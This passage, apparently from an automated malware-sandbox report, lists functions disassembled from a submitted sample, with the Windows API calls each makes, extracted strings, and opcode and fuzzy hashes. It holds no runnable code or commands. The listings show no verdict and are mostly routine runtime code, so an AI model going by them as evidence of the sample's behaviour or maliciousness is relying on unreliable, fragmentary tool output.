                                                                      • Part of subcall function 00D9C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D9BF5E,?,?), ref: 00D9C334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\$vC`
                                                                    • API String ID: 243576179-37205834
                                                                    • Opcode ID: 0ee9d76516cadb53b3bb3d20ebc691c88a0ea39251f694b6f919bcb3603304d8
                                                                    • Instruction ID: a790cd770d92a5d551fd5ebecac5778fc45ce3251a03a33380dac8cf61708b99
                                                                    • Opcode Fuzzy Hash: 0ee9d76516cadb53b3bb3d20ebc691c88a0ea39251f694b6f919bcb3603304d8
                                                                    • Instruction Fuzzy Hash: 7DD170B1900249AFDF21DFA4DC41BEEB7A8FF05700F04451AFA46E7281DB74AA449BB0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: c51013501ff45093cdfda70de127c3c12f5d2acf99f0a13dbb08017025632f5f
                                                                    • Instruction ID: c8ab21493b54f00454431877f7b512468a853ce6dfccb6baef862ebd0a3b1e27
                                                                    • Opcode Fuzzy Hash: c51013501ff45093cdfda70de127c3c12f5d2acf99f0a13dbb08017025632f5f
                                                                    • Instruction Fuzzy Hash: 2FC22871E0862ACFDB25CE289D40BEAB7B5EB45304F1841EED44DE7241E775AE818F60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: CMT$h%u$hc%u
                                                                    • API String ID: 589789837-3282847064
                                                                    • Opcode ID: 96277a7dbd2fc884aeed13fc1db95441dbac7339764d0a779d993622f3cd7002
                                                                    • Instruction ID: de79b7dafe1f2d06c73b2719436631982c8f7a200f17591da221d6d351ba7e5f
                                                                    • Opcode Fuzzy Hash: 96277a7dbd2fc884aeed13fc1db95441dbac7339764d0a779d993622f3cd7002
                                                                    • Instruction Fuzzy Hash: 4B42C231A05245ABDF24DF74C895BEE7BA5EF15300F080479F84A9B287DB70AA49CB71
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 00D935C3
                                                                      • Part of subcall function 00DA3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,00000001,00D9DA04,00000000,?,?,0001040E,?,?), ref: 00DA3D2C
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D9370D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                    • String ID: CMT
                                                                    • API String ID: 1610651222-2756464174
                                                                    • Opcode ID: 00b562bbb528c4898360ad368eb3ed00b73c3385b93e076df1f6aae710b7e047
                                                                    • Instruction ID: 5e0b290760b36d667974e3c9a9a2ba6159e269b171be2f5e4dbf74eba1e50071
                                                                    • Opcode Fuzzy Hash: 00b562bbb528c4898360ad368eb3ed00b73c3385b93e076df1f6aae710b7e047
                                                                    • Instruction Fuzzy Hash: 11620471A002949FCF19DF78C8956EE7BF1EF15304F08057EE88A9B282DA749A45CB71
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DB1FD6
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00DB20A2
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DB20C2
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00DB20CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 5260fd75b11dfde4d60c337bd1f54b8c2d8f961ef65dabae157cb77f0e0d999d
                                                                    • Instruction ID: 362b50dfac774dbedc2dcc4bbe9fd389d066a0b26ba967c303bed59fe761da88
                                                                    • Opcode Fuzzy Hash: 5260fd75b11dfde4d60c337bd1f54b8c2d8f961ef65dabae157cb77f0e0d999d
                                                                    • Instruction Fuzzy Hash: 6A311A75D05319DBDB21EFA4D989BCCBBB8BF08300F10409AE409AB250EB719A84CF24
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(80000000,00DB0AC5,0000001C,00DB0CBA,00000000,?,?,?,?,?,?,?,00DB0AC5,00000004,00DF5D24,00DB0D4A), ref: 00DB0B91
                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00DB0AC5,00000004,00DF5D24,00DB0D4A), ref: 00DB0BAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: InfoQuerySystemVirtual
                                                                    • String ID: D
                                                                    • API String ID: 401686933-2746444292
                                                                    • Opcode ID: f6e3b70348d50ea2380c47012d248e3db579563bb2ad1e0547f24c482d1498cd
                                                                    • Instruction ID: bcba693542133346aaef24cacb5e824cbba673de27c83337f6a8d91e0ceb285a
                                                                    • Opcode Fuzzy Hash: f6e3b70348d50ea2380c47012d248e3db579563bb2ad1e0547f24c482d1498cd
                                                                    • Instruction Fuzzy Hash: 1D01A772600209ABDB14DF29DC05FDE7BA9AFC4328F0CC224AD5AD7255DA34E9158694
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00DB6577
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00DB6581
                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00DB658E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 792369abf51438dfe1481ee07e6b70bffbdf2d3ed3c5f62c31c9b8cfb7f68b18
                                                                    • Instruction ID: 561c116575265b6ae5589b9ebc486df39d49f3f14dbe5822c5542a0095e70a7d
                                                                    • Opcode Fuzzy Hash: 792369abf51438dfe1481ee07e6b70bffbdf2d3ed3c5f62c31c9b8cfb7f68b18
                                                                    • Instruction Fuzzy Hash: 0031C475901329EBCB21DF68D889BDCBBB8EF08310F5041DAE81DA7251E7349B858F64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                                                    • Instruction ID: fb6f184dca56a4c49caaf08afe86631c1dc72181747468b9ac14226ebc8b34b1
                                                                    • Opcode Fuzzy Hash: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                                                    • Instruction Fuzzy Hash: F5021D71E00219DBDF14CFA9C8906EDBBF1EF48314F298269E91AE7345D731AA41CB94
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DAD0E1
                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00DD272C,?,?), ref: 00DAD12A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FormatInfoLocaleNumber
                                                                    • String ID:
                                                                    • API String ID: 2169056816-0
                                                                    • Opcode ID: 266f0a286a881bb6562068983ca7f7b76848e3f5dcbb6899cbfab5581e5b5daf
                                                                    • Instruction ID: 6efa8a328125f28d74c2b21f1d255d6b126c13151c6b06a4c78a4f67734ce916
                                                                    • Opcode Fuzzy Hash: 266f0a286a881bb6562068983ca7f7b76848e3f5dcbb6899cbfab5581e5b5daf
                                                                    • Instruction Fuzzy Hash: 64113939610308BBD711DF64DC41FAA77B8EF18701F51842AF902E7291D670AA85CB75
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00D97D6C,?,00000400), ref: 00D97BFF
                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D97C20
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 57f3de8e598fff7605c927d1cb0a68e81ef0368e80a609209beb437d12a8668c
                                                                    • Instruction ID: d1cc5d23126a85d60ab91b884be73787328d87f2d7bc1bc0b5b21b5017e908b7
                                                                    • Opcode Fuzzy Hash: 57f3de8e598fff7605c927d1cb0a68e81ef0368e80a609209beb437d12a8668c
                                                                    • Instruction Fuzzy Hash: F0D0C971388302BBFF110A604C06F2A7799BB55B51F18C804B755E81E0CA70D424B639
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DC403F,?,?,00000008,?,?,00DC3CDF,00000000), ref: 00DC4271
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 67e53badf0b9899f3951c4364b9330b3f9d73ce6790be9aed78c476032106dbc
                                                                    • Instruction ID: f5260cd2dde7ef57a3dad4d19c19f7d5bbc687ae19d515d1c41e13b875b7d7ef
                                                                    • Opcode Fuzzy Hash: 67e53badf0b9899f3951c4364b9330b3f9d73ce6790be9aed78c476032106dbc
                                                                    • Instruction Fuzzy Hash: E3B1693161060A8FD719CF28C49AF657BA0FF45365F29865CE8D9CF2A1C335E992CB50
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00D9D0A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 556731ecf077a1e7e1fdfc5235575ce8c9e7513415be64003bebf6dfd04bf3f4
                                                                    • Instruction ID: 42e4eee6460fcca3c7188cd822fb44055fdf70b5b66091eaf6b9d43e56b95149
                                                                    • Opcode Fuzzy Hash: 556731ecf077a1e7e1fdfc5235575ce8c9e7513415be64003bebf6dfd04bf3f4
                                                                    • Instruction Fuzzy Hash: D8014B70901708CFDB24DF24EC81AAD77B2BB58304F20421AE51AD7395DB709909CF60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gj
                                                                    • API String ID: 0-4203073231
                                                                    • Opcode ID: 24fde2b3a055ea685a6a262d75c057d11825fd98679bd91ba631d91d77849dd8
                                                                    • Instruction ID: eff980f85ac5289b279dc95a9260cbe93f84aac3276cf27b22f44f1feb0f7483
                                                                    • Opcode Fuzzy Hash: 24fde2b3a055ea685a6a262d75c057d11825fd98679bd91ba631d91d77849dd8
                                                                    • Instruction Fuzzy Hash: AED134B2A083458FC754CF29D88065AFBE2BFC9308F59492EE998D7301D734E955CB92
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00022170,00DB1BC5), ref: 00DB2162
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: cd20a827d6d269129b468eb44410e0d8caf7752590ce17f5ec05776e164f3b4a
                                                                    • Instruction ID: fa5552473a4d82f5d13fb5afea29e1f6e3e5028e8a7e0c25489bbf854b15af10
                                                                    • Opcode Fuzzy Hash: cd20a827d6d269129b468eb44410e0d8caf7752590ce17f5ec05776e164f3b4a
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                                                    • Instruction ID: 3adab0a2aff35d03938755f5af9e4502e3e4320b560042e659706732042c5cb8
                                                                    • Opcode Fuzzy Hash: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                                                    • Instruction Fuzzy Hash: 27114F719047159FD728CF6E885576AB7F4FF01714F10C82ED4A6E2280D379E640CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: a8e5f9d9ba00cfc26e18c0cf480e26ebcc5894ca970e172c2b7ad763f9570190
                                                                    • Instruction ID: 02bb1fe0af48ae9c40b417cdbf808b8386e504709550ea0eeea52513393db07a
                                                                    • Opcode Fuzzy Hash: a8e5f9d9ba00cfc26e18c0cf480e26ebcc5894ca970e172c2b7ad763f9570190
                                                                    • Instruction Fuzzy Hash: CFA02230200303EF83008F33AE0830C3AF8FA022C2308C02AA008C0B30EB3AC022CF20
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
                                                                    • Instruction ID: ec1fa996244e564d997069fe94d62b422cb5f3650e5c95a5d627b3ebef4e1b27
                                                                    • Opcode Fuzzy Hash: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
